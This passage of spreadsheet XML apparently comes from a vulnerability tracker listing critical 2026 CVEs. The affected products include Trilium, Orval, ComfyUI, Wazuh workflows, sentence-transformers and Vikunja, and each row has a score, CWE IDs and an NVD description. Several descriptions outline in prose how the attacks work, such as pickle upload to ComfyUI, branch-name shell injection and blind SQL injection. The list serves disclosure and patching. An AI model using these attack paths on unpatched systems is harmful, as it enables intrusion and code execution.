          <t>Trilium is an open-source hierarchical note-taking application. In versions up to and including 0.103.0, the default-on "Safe import" filter does not sanitize note titles, and the GeoMap note view interpolates a marker note's title into raw HTML that is rendered as innerHTML, allowing an attacker-supplied import archive to inject script that runs when the map is displayed. Because Safe import neutralizes scripts but never escapes titles, a note whose title contains an HTML event-handler payload survives the import and executes as soon as the victim opens the GeoMap that renders its marker. On the desktop client the Electron renderer runs with Node integration enabled, so the injected JavaScript escalates from cross-site scripting to full remote code execution on the victim's machine. This issue is fixed in version 0.104.0.</t>
        </is>
      </c>
      <c r="M143" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48996</t>
        </is>
      </c>
    </row>
    <row r="144">
      <c r="A144" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B144" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53578</t>
        </is>
      </c>
      <c r="C144" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D144" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E144" s="5" t="inlineStr"/>
      <c r="F144" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G144" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H144" s="5" t="inlineStr"/>
      <c r="I144" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="J144" s="5" t="inlineStr"/>
      <c r="K144" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-94</t>
        </is>
      </c>
      <c r="L144" s="5" t="inlineStr">
        <is>
          <t>Trilium is an open-source hierarchical note-taking application. In versions up to and including 0.103.0, the default-on "Safe import" filter sanitizes HTML only for text notes and excludes the mindMap note type, whose JSON content is stored without sanitization, allowing an attacker-supplied import archive to embed a payload that renders as arbitrary HTML. A mind map node can carry a dangerouslySetInnerHTML property that the Mind Elixir library assigns directly to a node's innerHTML, so a malicious note survives Safe import and executes script as soon as the victim opens the imported mind map. On the desktop client the Electron renderer runs with Node integration enabled, so the injected JavaScript escalates from cross-site scripting to full remote code execution on the victim's machine. This issue is fixed in version 0.104.0.</t>
        </is>
      </c>
      <c r="M144" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53578</t>
        </is>
      </c>
    </row>
    <row r="145">
      <c r="A145" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B145" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53579</t>
        </is>
      </c>
      <c r="C145" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D145" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E145" s="5" t="inlineStr"/>
      <c r="F145" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G145" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H145" s="5" t="inlineStr"/>
      <c r="I145" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="J145" s="5" t="inlineStr"/>
      <c r="K145" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-94</t>
        </is>
      </c>
      <c r="L145" s="5" t="inlineStr">
        <is>
          <t>Trilium is an open-source hierarchical note-taking application. In versions up to and including 0.103.0, the default-on "Safe import" filter sanitizes HTML only for text notes and excludes the book note type, whose content is stored without sanitization and later rendered as HTML, allowing an attacker-supplied import archive to embed a payload that executes as script. A book note's content is routed through the same rendering path as text notes and injected into the page with jQuery's html method when the note is shown as a grid-view preview card, so a malicious note survives Safe import and runs as soon as the victim opens the containing note. On the desktop client the Electron renderer runs with Node integration enabled, so the injected JavaScript escalates from cross-site scripting to full remote code execution on the victim's machine. This issue is fixed in version 0.104.0.</t>
        </is>
      </c>
      <c r="M145" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53579</t>
        </is>
      </c>
    </row>
    <row r="146">
      <c r="A146" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B146" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55068</t>
        </is>
      </c>
      <c r="C146" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D146" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E146" s="5" t="inlineStr"/>
      <c r="F146" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G146" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H146" s="5" t="inlineStr"/>
      <c r="I146" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J146" s="5" t="inlineStr"/>
      <c r="K146" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L146" s="5" t="inlineStr">
        <is>
          <t>free5GC is an open-source implementation of the 5G core network. In 4.2.2 and earlier, the NRF RegisterNFInstance handler at PUT /nnrf-nfm/v1/nf-instances/{nfInstanceID} accepts NF Profiles without enforcing UUID format, nfStatus enum values, heartBeatTimer ranges, mandatory profile fields, or nfServices.ipEndPoints address constraints. The invalid profiles are persisted in the MongoDB NfProfile collection and returned by NFDiscover, allowing an attacker with SBI access to advertise attacker-controlled network-function endpoints and redirect control-plane signaling. This can expose credentials and signaling, alter service discovery integrity, and deny service across network functions that trust the NRF. This issue is fixed in version 4.2.3.</t>
        </is>
      </c>
      <c r="M146" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55068</t>
        </is>
      </c>
    </row>
    <row r="147">
      <c r="A147" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B147" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55378</t>
        </is>
      </c>
      <c r="C147" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D147" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E147" s="5" t="inlineStr"/>
      <c r="F147" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G147" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H147" s="5" t="inlineStr"/>
      <c r="I147" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J147" s="5" t="inlineStr"/>
      <c r="K147" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L147" s="5" t="inlineStr">
        <is>
          <t>JS Recon is a JavaScript enumeration and SAST tool. From 1.2.1-beta.1 until 1.3.1-beta.2, the PR Branch Checker workflow in .github/workflows/pr_checker.yml places github.head_ref and github.event.pull_request.head.repo.full_name into BRANCH_NAME and SOURCE_REPO and interpolates those untrusted values into a shell gh pr comment command. A remote user who opens a pull request can use shell metacharacters in a branch or fork name to execute commands in the GitHub Actions runner with the workflow's GITHUB_TOKEN, which has pull-requests write permission. This issue is fixed in version 1.3.1-beta.2.</t>
        </is>
      </c>
      <c r="M147" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55378</t>
        </is>
      </c>
    </row>
    <row r="148">
      <c r="A148" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B148" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62681</t>
        </is>
      </c>
      <c r="C148" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D148" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E148" s="5" t="inlineStr"/>
      <c r="F148" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G148" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H148" s="5" t="inlineStr"/>
      <c r="I148" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J148" s="5" t="inlineStr"/>
      <c r="K148" s="5" t="inlineStr">
        <is>
          <t>CWE-116, CWE-1336, CWE-94</t>
        </is>
      </c>
      <c r="L148" s="5" t="inlineStr">
        <is>
          <t>Orval generates type-safe JavaScript clients in TypeScript from OpenAPI v3 and Swagger v2 specifications. Prior to 8.21.0, an unescaped backtick in an OpenAPI path is emitted into request URL template literals generated for axios, fetch, react-query, and SWR clients without safe encoding. This permits attacker-controlled JavaScript to be evaluated when a generated request, URL-builder, or query-key function is called, resulting in code execution in the developer, CI, test, or application environment. The affected code is packages/core/src/getters/route.ts and route generation consumers. This issue is fixed in version 8.21.0.</t>
        </is>
      </c>
      <c r="M148" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62681</t>
        </is>
      </c>
    </row>
    <row r="149">
      <c r="A149" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B149" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62682</t>
        </is>
      </c>
      <c r="C149" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D149" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E149" s="5" t="inlineStr"/>
      <c r="F149" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G149" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H149" s="5" t="inlineStr"/>
      <c r="I149" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J149" s="5" t="inlineStr"/>
      <c r="K149" s="5" t="inlineStr">
        <is>
          <t>CWE-116, CWE-1336, CWE-94</t>
        </is>
      </c>
      <c r="L149" s="5" t="inlineStr">
        <is>
          <t>Orval generates type-safe JavaScript clients in TypeScript from OpenAPI v3 and Swagger v2 specifications. Prior to 8.21.0, an unescaped backtick in servers[0].url is emitted into request URL template literals generated when output.baseUrl.getBaseUrlFromSpecification is enabled without safe encoding. This permits attacker-controlled JavaScript to be evaluated when a generated request or URL-builder function is called, resulting in code execution in the developer, CI, test, or application environment. The affected code is packages/core/src/getters/route.ts function getFullRoute. This issue is fixed in version 8.21.0.</t>
        </is>
      </c>
      <c r="M149" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62682</t>
        </is>
      </c>
    </row>
    <row r="150">
      <c r="A150" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B150" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63106</t>
        </is>
      </c>
      <c r="C150" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D150" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E150" s="5" t="inlineStr"/>
      <c r="F150" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G150" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="H150" s="5" t="inlineStr"/>
      <c r="I150" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J150" s="5" t="inlineStr"/>
      <c r="K150" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L150" s="5" t="inlineStr">
        <is>
          <t>ReadyEcommerce before 4.5.2 contains an unauthenticated SQL injection vulnerability in the product listing API where the rating parameter from the products endpoint is concatenated directly into a MySQL HAVING clause without parameterization in ProductController.php. Attackers can perform time-based blind SQL injection through the unsanitized rating parameter to extract the full database contents, including user credentials and administrator password hashes, with potential additional file system access due to the database connection running as root.</t>
        </is>
      </c>
      <c r="M150" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63106</t>
        </is>
      </c>
    </row>
    <row r="151">
      <c r="A151" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B151" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66794</t>
        </is>
      </c>
      <c r="C151" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D151" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E151" s="5" t="inlineStr"/>
      <c r="F151" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G151" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="H151" s="5" t="inlineStr"/>
      <c r="I151" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J151" s="5" t="inlineStr"/>
      <c r="K151" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L151" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the `cluster-proxy-addon` component of Multicluster Engine for Kubernetes. This vulnerability allows an unauthenticated attacker, who can access the user-facing route, to bypass authentication and authorization checks. By manipulating URL path segments, the attacker can proxy requests to arbitrary services across any managed cluster. This enables unauthorized access to internal services that would otherwise be protected, potentially leading to information disclosure or further compromise of the cluster environment.</t>
        </is>
      </c>
      <c r="M151" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66794</t>
        </is>
      </c>
    </row>
    <row r="152">
      <c r="A152" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B152" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67308</t>
        </is>
      </c>
      <c r="C152" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D152" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E152" s="5" t="inlineStr"/>
      <c r="F152" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G152" s="5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="H152" s="5" t="inlineStr"/>
      <c r="I152" s="5" t="inlineStr">
        <is>
          <t>2026-08-01</t>
        </is>
      </c>
      <c r="J152" s="5" t="inlineStr"/>
      <c r="K152" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L152" s="5" t="inlineStr">
        <is>
          <t>Wazuh workflows before 44bf114 contain a shell injection vulnerability in GitHub Actions that allows attackers to execute arbitrary commands by submitting pull requests with crafted VERSION.json files. Attackers can inject shell metacharacters into environment variables that are directly interpolated into run steps, enabling command execution and exfiltration of secrets including GITHUB_TOKEN and AWS credentials on self-hosted runners.</t>
        </is>
      </c>
      <c r="M152" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67308</t>
        </is>
      </c>
    </row>
    <row r="153">
      <c r="A153" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B153" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68582</t>
        </is>
      </c>
      <c r="C153" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D153" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E153" s="5" t="inlineStr"/>
      <c r="F153" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G153" s="5" t="inlineStr">
        <is>
          <t>oracle</t>
        </is>
      </c>
      <c r="H153" s="5" t="inlineStr"/>
      <c r="I153" s="5" t="inlineStr">
        <is>
          <t>2026-08-02</t>
        </is>
      </c>
      <c r="J153" s="5" t="inlineStr"/>
      <c r="K153" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L153" s="5" t="inlineStr">
        <is>
          <t>Vikunja versions &gt;= 0.24.0 and &lt;= 2.3.0 contain a broken object level authorization (BOLA) vulnerability in the task-collection endpoint (GET /api/v1/projects/{project}/views/{view}/tasks). The endpoint loads the requested project view from the URL path without verifying the caller is authorized for it. For a link-share token holder, the task scope is pinned to the share's own project, but the view is taken from the attacker-controlled path and never re-validated. As a result, a holder of any project share link can read any other tenant's kanban bucket records — bucket titles and the full created_by user object (username, name, id) — for every view in the instance. The same missing pre-authorization view load also creates a project/view-ID existence oracle (404 vs. non-404) usable by link shares and ordinary authenticated users. Task contents remain constrained to the share's own project and are not disclosed. Fixed in 2.4.0.</t>
        </is>
      </c>
      <c r="M153" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68582</t>
        </is>
      </c>
    </row>
    <row r="154">
      <c r="A154" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B154" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68770</t>
        </is>
      </c>
      <c r="C154" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D154" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E154" s="5" t="inlineStr"/>
      <c r="F154" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G154" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H154" s="5" t="inlineStr"/>
      <c r="I154" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J154" s="5" t="inlineStr"/>
      <c r="K154" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L154" s="5" t="inlineStr">
        <is>
          <t>sentence-transformers contains a security control bypass vulnerability that allows attackers to achieve arbitrary code execution by exploiting a logic flaw in the import_module_class helper within sentence_transformers/util/misc.py, where the guard condition includes an 'or os.path.exists(model_name_or_path)' clause that satisfies the trust gate whenever the supplied path exists on the local filesystem, regardless of the trust_remote_code=False argument. Attackers who can control or influence the contents of a model directory on disk can place malicious Python files such as modeling_*.py referenced via modules.json, causing the code to execute at import time when an application loads the model with SentenceTransformer(path, trust_remote_code=False), bypassing the documented security contract and achieving code execution within the loading process.</t>
        </is>
      </c>
      <c r="M154" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68770</t>
        </is>
      </c>
    </row>
    <row r="155">
      <c r="A155" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B155" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68771</t>
        </is>
      </c>
      <c r="C155" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D155" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E155" s="5" t="inlineStr"/>
      <c r="F155" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G155" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H155" s="5" t="inlineStr"/>
      <c r="I155" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J155" s="5" t="inlineStr"/>
      <c r="K155" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="L155" s="5" t="inlineStr">
        <is>
          <t>ComfyUI v0.23.0 contains an unsafe deserialization vulnerability in the LoadTrainingDataset node that allows unauthenticated remote attackers to execute arbitrary Python code by uploading a crafted pickle file and triggering its deserialization. Attackers can upload a malicious shard_*.pkl file via the unauthenticated POST /upload/image endpoint and then queue a workflow graph via POST /prompt referencing the uploaded file, causing torch.load to deserialize the attacker-controlled pickle payload using __reduce__ and execute arbitrary commands as the ComfyUI process user.</t>
        </is>
      </c>
      <c r="M155" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68771</t>
        </is>
      </c>
    </row>
    <row r="156">
      <c r="A156" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B156" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69356</t>
        </is>
      </c>
      <c r="C156" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D156" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E156" s="5" t="inlineStr"/>
      <c r="F156" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G156" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H156" s="5" t="inlineStr"/>
      <c r="I156" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J156" s="5" t="inlineStr"/>
      <c r="K156" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L156" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Exchange Server allows an unauthorized attacker to perform spoofing over a network.</t>
        </is>
      </c>
      <c r="M156" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69356</t>
        </is>
      </c>
    </row>
    <row r="157">
      <c r="A157" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B157" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71864</t>
        </is>
      </c>
      <c r="C157" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D157" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E157" s="5" t="inlineStr"/>
      <c r="F157" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G157" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H157" s="5" t="inlineStr"/>
      <c r="I157" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J157" s="5" t="inlineStr"/>
      <c r="K157" s="5" t="inlineStr">
        <is>
          <t>CWE-116, CWE-94, CWE-95</t>
        </is>
      </c>
      <c r="L157" s="5" t="inlineStr">
        <is>
          <t>Orval generates type-safe JavaScript clients in TypeScript from OpenAPI v3 and Swagger v2 specifications. Prior to 8.21.0, a double quote in a header parameter name is emitted into the generated request-validation zod.object({...}) schema without safe encoding. This permits attacker-controlled JavaScript to be evaluated when the generated zod schema module is imported, resulting in code execution in the developer, CI, test, or application environment. The affected code is packages/zod/src/index.ts and header request-validation generation. This issue is fixed in version 8.21.0.</t>
        </is>
      </c>
      <c r="M157" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71864</t>
        </is>
      </c>
    </row>
    <row r="158">
      <c r="A158" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B158" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71865</t>
        </is>
      </c>
      <c r="C158" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D158" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E158" s="5" t="inlineStr"/>
      <c r="F158" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G158" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H158" s="5" t="inlineStr"/>
      <c r="I158" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J158" s="5" t="inlineStr"/>
      <c r="K158" s="5" t="inlineStr">
        <is>
          <t>CWE-116, CWE-94, CWE-95</t>
        </is>
      </c>
      <c r="L158" s="5" t="inlineStr">
        <is>
          <t>Orval generates type-safe JavaScript clients in TypeScript from OpenAPI v3 and Swagger v2 specifications. Prior to 8.21.0, a double quote in a query parameter name is emitted into the generated request-validation zod.object({...}) schema without safe encoding. This permits attacker-controlled JavaScript to be evaluated when the generated zod schema module is imported, resulting in code execution in the developer, CI, test, or application environment. The affected code is packages/zod/src/index.ts and query request-validation generation. This issue is fixed in version 8.21.0.</t>
        </is>
      </c>
      <c r="M158" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71865</t>
        </is>
      </c>
    </row>
    <row r="159">
      <c r="A159" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B159" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71866</t>
        </is>
      </c>
      <c r="C159" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D159" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E159" s="5" t="inlineStr"/>
      <c r="F159" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G159" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H159" s="5" t="inlineStr"/>
      <c r="I159" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J159" s="5" t="inlineStr"/>
      <c r="K159" s="5" t="inlineStr">
        <is>
          <t>CWE-89, CWE-95</t>
        </is>
      </c>
      <c r="L159" s="5" t="inlineStr">
        <is>
          <t>Orval generates type-safe JavaScript clients in TypeScript from OpenAPI v3 and Swagger v2 specifications. From version 8.19.0 until 8.21.0, a double quote in a schema property name is emitted into the generated zod.object({...}) schema without safe encoding. This permits attacker-controlled JavaScript to be evaluated when the generated zod schema module is imported, resulting in code execution in the developer, CI, test, or application environment. The affected code is packages/zod/src/index.ts and zod object-key generation. This issue is fixed in version 8.21.0.</t>
        </is>
      </c>
      <c r="M159" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71866</t>
        </is>
      </c>
    </row>
    <row r="160">
      <c r="A160" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B160" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71867</t>
        </is>
      </c>
      <c r="C160" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D160" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E160" s="5" t="inlineStr"/>
      <c r="F160" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G160" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H160" s="5" t="inlineStr"/>
      <c r="I160" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J160" s="5" t="inlineStr"/>
      <c r="K160" s="5" t="inlineStr">
        <is>
          <t>CWE-89, CWE-95</t>
        </is>
      </c>
      <c r="L160" s="5" t="inlineStr">
        <is>
          <t>Orval generates type-safe JavaScript clients in TypeScript from OpenAPI v3 and Swagger v2 specifications. Prior to 8.21.0, a single quote in a schema property name is emitted into single-quoted object keys in generated MSW mock factories without safe encoding. This permits attacker-controlled JavaScript to be evaluated when the generated mock factory is called by tests or an MSW handler, resulting in code execution in the developer, CI, test, or application environment. The affected code is packages/core/src/getters/keys.ts function getKey and MSW mock generation. This issue is fixed in version 8.21.0.</t>
        </is>
      </c>
      <c r="M160" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71867</t>
        </is>
      </c>
    </row>
    <row r="161">
      <c r="A161" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B161" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71868</t>
        </is>
      </c>
      <c r="C161" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D161" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E161" s="5" t="inlineStr"/>
      <c r="F161" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G161" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H161" s="5" t="inlineStr"/>
      <c r="I161" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J161" s="5" t="inlineStr"/>
      <c r="K161" s="5" t="inlineStr">
        <is>
          <t>CWE-1336, CWE-94</t>
        </is>
      </c>
      <c r="L161" s="5" t="inlineStr">
        <is>
          <t>Orval generates type-safe JavaScript clients in TypeScript from OpenAPI v3 and Swagger v2 specifications. Prior to 8.21.0, a ${...} expression or backtick in an enum default is emitted into a module-level template literal emitted by zod schema generation without safe encoding. This permits attacker-controlled JavaScript to be evaluated when the generated zod schema module is imported, resulting in code execution in the developer, CI, test, or application environment. The affected code is packages/zod/src/index.ts function formatDefaultValue. This issue is fixed in version 8.21.0.</t>
        </is>
      </c>
      <c r="M161" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71868</t>
        </is>
      </c>
    </row>
    <row r="162">
      <c r="A162" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B162" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71869</t>
        </is>
      </c>
      <c r="C162" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D162" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E162" s="5" t="inlineStr"/>
      <c r="F162" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G162" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H162" s="5" t="inlineStr"/>
      <c r="I162" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J162" s="5" t="inlineStr"/>
      <c r="K162" s="5" t="inlineStr">
        <is>
          <t>CWE-116, CWE-1336, CWE-94</t>
        </is>
      </c>
      <c r="L162" s="5" t="inlineStr">
        <is>
